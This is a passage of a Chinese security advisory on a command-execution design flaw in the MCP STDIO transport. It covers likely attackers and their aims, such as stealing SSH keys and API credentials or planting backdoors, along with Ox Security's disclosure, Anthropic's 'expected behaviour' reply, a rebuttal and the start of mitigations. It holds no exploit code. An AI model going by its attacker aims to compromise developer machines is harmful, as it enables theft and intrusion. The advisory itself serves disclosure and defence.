10);"><p><span leaf="">• 目标价值高：开发者机器通常存储SSH密钥、API凭证、项目代码</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">高级持续性威胁（APT）组织</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 供应链投毒模式契合APT攻击链设计</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 可针对特定开发团队实施定向入侵</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 利用开发者环境横向移动至目标企业网络</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">企业竞争对手/商业间谍</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 窃取竞品代码和商业机密</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 获取API密钥进行资源滥用</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 在开发阶段植入后门，实现长期潜伏</span></p></li></ul><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞处置现状与厂商立场分析</span></h2><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">负责任披露过程</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">Ox Security安全研究团队于2025年11月启动该研究，历时约5个月，完成超过</span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">30次</span></strong><span leaf="">负责任披露协调：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 向Anthropic提交漏洞详情及修复建议</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 协调30余家MCP提供商修补具体产品漏洞</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 推动10余个高危/严重级别CVE的发布</span></p></li></ul><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Anthropic官方立场</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">核心结论</span></strong><span leaf="">：Anthropic拒绝修改协议底层架构，明确表示该行为属于&#34;预期行为&#34;。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">官方解释</span></strong><span leaf="">：</span></p><ol style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: none;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">1. STDIO执行模型代表&#34;安全默认值&#34;</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">2. 输入清理责任应完全由SDK使用者承担</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">3. 仅更新安全指南，建议开发者&#34;谨慎&#34;使用STDIO适配器</span></p></li></ol><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">后续动作</span></strong><span leaf="">：收到研究报告一周后，Anthropic悄然更新安全策略文档，将STDIO适配器使用标注为&#34;需谨慎&#34;。</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信专业评估</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">从安全工程实践角度，奇安信威胁情报团队对Anthropic的立场持</span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">明确异议</span></strong><span leaf="">：</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">架构层面的安全责任不可下放</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 协议设计者对协议安全性承担首要责任</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• SDK使用者无法在协议层施加有效安全约束</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• &#34;由使用者负责清理&#34;意味着每个下游项目都需重复实现安全机制</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 架构缺陷导致的系统性风险无法通过下游补丁有效控制</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">&#34;预期行为&#34;不等于&#34;安全行为&#34;</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 安全协议设计应遵循&#34;默认安全&#34;原则</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 命令执行前应进行显式授权验证</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• STDIO传输层的&#34;先执行后验证&#34;模式本质上是不安全的设计选择</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">SDK层面的10+ CVE印证了架构缺陷</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 若问题仅存在于下游实现，相关厂商应可独立修复</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 大量独立产品出现同类漏洞，指向共同的架构根因</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Anthropic作为协议制定者，有能力也有责任从协议层面解决该问题</span></p></li></ul><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">缓解措施与安全建议</span></h2><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">短期应急措施</span></h3><table style="box-sizing: border-box;border-width: 0px;border-style: solid;border-color: inherit;border-image: initial;margin-top: 0px !important;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);text-indent: 0px;border-collapse: collapse;border-spacing: 0px;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">措施类别</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 